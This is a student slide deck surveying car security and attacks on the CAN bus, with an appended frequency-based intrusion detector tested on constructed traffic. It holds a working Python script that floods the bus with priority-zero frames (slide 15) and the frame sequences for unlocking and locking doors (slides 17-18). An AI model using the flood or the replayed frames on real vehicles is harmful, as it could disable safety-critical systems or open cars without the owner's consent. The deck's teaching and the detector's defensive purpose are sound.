
Car Security

Dange
August 24, 2018



Transcript

  1. Car Security: Attacking On the CAN Bus
    Student : Tien-Chih Lin@NCKU
    Advisor : PK, Birdman, Benson, Alan
  2. $ Outline
    • Attack Vector
    • Intro of CAN Bus
    • Security Issues on CAN Bus
    • Conclusion
  3. $ Physical Attack
    • Attack Interface
    • USB Ports
    • SD-Card Ports
    • CD-ROM / DVD-ROM
    • Touch Screen
    • CAT-5
  4. $ Scanning with nmap

    | Device | IP | Port | Service |
    |---|---|---|---|
    | CID (Central Information Display) | 192.168.90.100 | 22/tcp | ssh |
    | | | 53/tcp | domain |
    | | | 80/tcp | http |
    | | | 111/tcp | rpcbind |
    | | | 2049/tcp | nfs |
    | | | 6000/tcp | X11 |
    | IC (Instrument Cluster) | 192.168.90.101 | 22/tcp | ssh |
    | | | 111/tcp | rpcbind |
    | | | 6000/tcp | X11 |
    | Gateway | 192.168.90.102 | 23/tcp | telnet |
    | | | 1050/tcp | java-or-OTGfileshare |

  5. $ Remote Attack
    • Attack Interface
    • Bluetooth
    • Wi-Fi
    • Cellular Connection
    • Remote Keyless Entry
    • TPMS
  6. $ Case Study : Remote Keyless Entry
    • Rolling Code
    • Messages: UID, enc_k(ctr′, btn); UID, enc_k(ctr′ + 1, btn); UID, enc_k(ctr′ + 2, btn)
    • Validity window: ctr to ctr + ∆
    • Check: decrypt ctr′; if (ctr < ctr′ < ctr + ∆) then ctr := ctr′ and open/close
  7. $ Case Study : Remote Keyless Entry
    • Attack Rolling Code
    • Message: UID, enc_k(ctr′, btn)
    • Attack crypto
    • Attack key management
  8. $ Case Study : API
    • Controlling vehicle features of Nissan LEAFs across the globe via vulnerable APIs
  9. $ Respond

    ```
    {
      status: 200,
      message: "success",
      BatteryStatusRecords: {
        OperationResult: "START",
        OperationDateAndTime: "jan 21, 2016 21:47",
        BatteryStatus: {
          BatteryChargingStatus: "NORMAL_CHARGING",
          BatteryCapacity: "12",
          BatteryRemainingAmount: "12",
          BatteryRemainingAmountWH: "",
        },
        PluginState: "CONNECTED",
        CruisingRangeAcOn: "135664.0",
        CruisingRangeAcOff: "157904.0",
        NotificationDateAndTime: "2016/01/21 20:47",
        TargetDate: "2016/01/21 20:47"
      }
    }
    ```

  10. $ Case Study : Wi-Fi
    • Black Hat 2017 : Free-fall: Tesla Hacking
    − Get control of Wi-Fi
    − Exploit the WebKit Browser
    − Root the in-vehicle system
    − Patch and Disable AppArmor
    − Bypass ECU’s firmware integrity verification
    − Reprogram modified Gateway firmware
    − Send malicious CAN msg on CAN Bus
    − Get Control of CAN Bus
    [Diagram labels: CID, ECUs]
  11. $ What is CAN Bus?
    • Controller Area Network
    • Low cost, integrated controllers
    [Diagram: Head light, Tail light, Dash board, Doors, ABS, Engine Control, Suspension Control and a Gateway; Low Speed CAN (Body Control Bus) and High Speed CAN (Powertrain Control Bus)]
  12. $ CAN Data Frame Format
    • Arbitration Identifier (ArbID): 11 bits or 29 bits
    • Data Length Code (DLC): 4 bits
    • Data: up to 8 bytes
  13. $ CAN Bus Arbitration
    • Supported by hardware
    • Software implementation becomes easy and immediate.
    • priority : 0 > 1
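  14. $ Fault Confinement
    • States: Error Active, Error Passive, Bus Off
    • Reset and Config → Error Active
    • Error Active → Error Passive: REC >= 127 or TEC >= 127
    • Error Passive → Error Active: REC < 127 or TEC < 127
    • Error Passive → Bus Off: TEC > 255
    • Bus Off → Error Active: Reset, Config and Reception of 128x11 Recessive Bits
    • REC: Receive Error Counter
    • TEC: Transmit Error Counter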
  15. $ Denial-of-Service

    ```python
    import ics

    device = ics.find_devices()[0]
    ics.open_device(device)
    NetworkID = ics.NETID_HSCAN
    ics.set_bit_rate(device, 500000, NetworkID)

    msg = ics.SpyMessage()  # Setup the message
    msg.ArbIDOrHeader = 0x0  # CAN ID
    msg.NetworkID = NetworkID  # Channel 1 on the ValueCAN
    msg.Data = (0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0)
    while True:
        ics.transmit_messages(device, msg)
    ```

  16. $ Replay Attack
    [Diagram: Head light, Tail light, Dash board, Doors, ABS, Engine Control, Suspension Control, Gateway and an Attacker]
  17. $ Unlock the Door

    | ArbID | Data… |
    |---|---|
    | 44D | 4D,00,80,00,00,00,00,00 |
    | 440 | 40,00,80,11,01,0F,0F,0F |
    | 442 | 42,00,80,00,00,00,00,00 |
    | 44D | 4D,01,80,00,01,00,00,00 |
    | 440 | 40,01,80,11,01,00,00,00 |
    | 631 | 18,80,53,04,00,12,00,00 |

  18. $ Lock the Door

    | ArbID | Data… |
    |---|---|
    | 44D | 4D,00,80,00,00,00,00,00 |
    | 440 | 40,00,80,11,01,0F,0F,0F |
    | 442 | 42,00,80,00,00,00,00,00 |
    | 44D | 4D,01,80,00,01,00,00,00 |
    | 440 | 40,01,80,11,01,00,00,00 |
    | 631 | 18,80,53,02,00,12,00,00 |

  19. >_ Conclusion
    • Survey of Car Security
    − Cyber security skills are useful in car security.
    • CAN Bus
    − A useful protocol before the car connects to the Internet.
    − Easy to attack with DoS and replay attacks.
  20. $ Reference
    • https://hitcon.org/2018/CMT/slide-files/d2_s0_r0_keynote.pdf
    • http://www.blackhat.com/docs/asia-15/materials/asia-15-Evenchick-Hopping-On-The-Can-Bus.pdf
    • http://www.cheyun.com/content/15847
    • http://illmatics.com/carhacking.html
    • https://www.tomshardware.co.uk/intel-automotive-security-review-board,news-51291.html
    • https://blog.lookout.com/hacking-a-tesla
    • https://www.blackhat.com/docs/us-17/thursday/us-17-Nie-Free-Fall-Hacking-Tesla-From-Wireless-To-CAN-Bus.pdf
    • https://www.cryptacus.eu/en/wp-content/uploads/201611_WG4_Garcia.pdf
    • https://www.troyhunt.com/controlling-vehicle-features-of-nissan/
    • http://wiki.csie.ncku.edu.tw/embedded/CAN
    • https://goo.gl/kXyyhx
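
A defender's view of the DoS (slide 15) and replay (slides 16 to 18) cases, as an added example that is not part of the original deck: a frequency-based check that learns each ArbID's peak frame rate from known-good traffic, then flags unknown ArbIDs and rate spikes. The log format (`<time in µs> <ArbID> <data>`, modeled on the ArbID/Data listings in the slides), the 100 ms window, the 2x factor and both captures are assumptions constructed for illustration.

```python
from collections import Counter, defaultdict

WINDOW_US = 100_000  # assumed analysis window: 100 ms
RATE_FACTOR = 2      # assumed: alert above 2x an ArbID's learned peak rate

def parse(line):
    """'<time_us> <ArbID hex> <b0,b1,...>' -> (time_us, arb_id, payload)."""
    ts, arb, data = line.split()
    arb_id, payload = int(arb, 16), bytes(int(b, 16) for b in data.split(","))
    if arb_id > 0x1FFFFFFF or len(payload) > 8:  # 29-bit ID, at most 8 data bytes
        raise ValueError(f"not a CAN data frame: {line!r}")
    return int(ts), arb_id, payload

def window_counts(lines):
    """Frames per ArbID in each WINDOW_US slice: {window_index: Counter}."""
    windows = defaultdict(Counter)
    for ts, arb_id, _ in map(parse, lines):
        windows[ts // WINDOW_US][arb_id] += 1
    return windows

def learn_baseline(lines):
    """Peak frames-per-window for every ArbID seen in known-good traffic."""
    peak = {}
    for counts in window_counts(lines).values():
        for arb_id, n in counts.items():
            peak[arb_id] = max(peak.get(arb_id, 0), n)
    return peak

def detect(lines, baseline):  # -> sorted (window_start_us, arb_id, frames, reason)
    alerts = []
    for idx, counts in window_counts(lines).items():
        for arb_id, n in counts.items():
            if arb_id not in baseline:
                alerts.append((idx * WINDOW_US, arb_id, n, "unknown ArbID"))
            elif n > RATE_FACTOR * baseline[arb_id]:
                alerts.append((idx * WINDOW_US, arb_id, n, "rate above baseline"))
    return sorted(alerts)

def periodic(arb, data, start_us, end_us, period_us):  # constructed sample frames
    return [f"{t} {arb} {data}" for t in range(start_us, end_us, period_us)]

def normal(end_us):  # constructed known-good traffic: two ArbIDs, each every 10 ms
    return (periodic("44D", "4D,00,80,00,00,00,00,00", 0, end_us, 10_000)
            + periodic("440", "40,00,80,11,01,0F,0F,0F", 1_000, end_us, 10_000))

GOOD = normal(500_000)  # constructed captures, not recorded from a vehicle
SUSPECT = (normal(200_000)
           + periodic("440", "40,01,80,11,01,00,00,00", 100_500, 200_000, 2_000)  # extra copies
           + periodic("000", "00,00,00,00,00,00,00,00", 200_000, 300_000, 250))   # ArbID 0x0 flood
print(*detect(SUSPECT, learn_baseline(GOOD)), sep="\n")
```

Run on the constructed capture, the extra 0x440 frames show up as a rate alert in the second window and the ArbID 0x000 flood as an unknown-ArbID alert in the third.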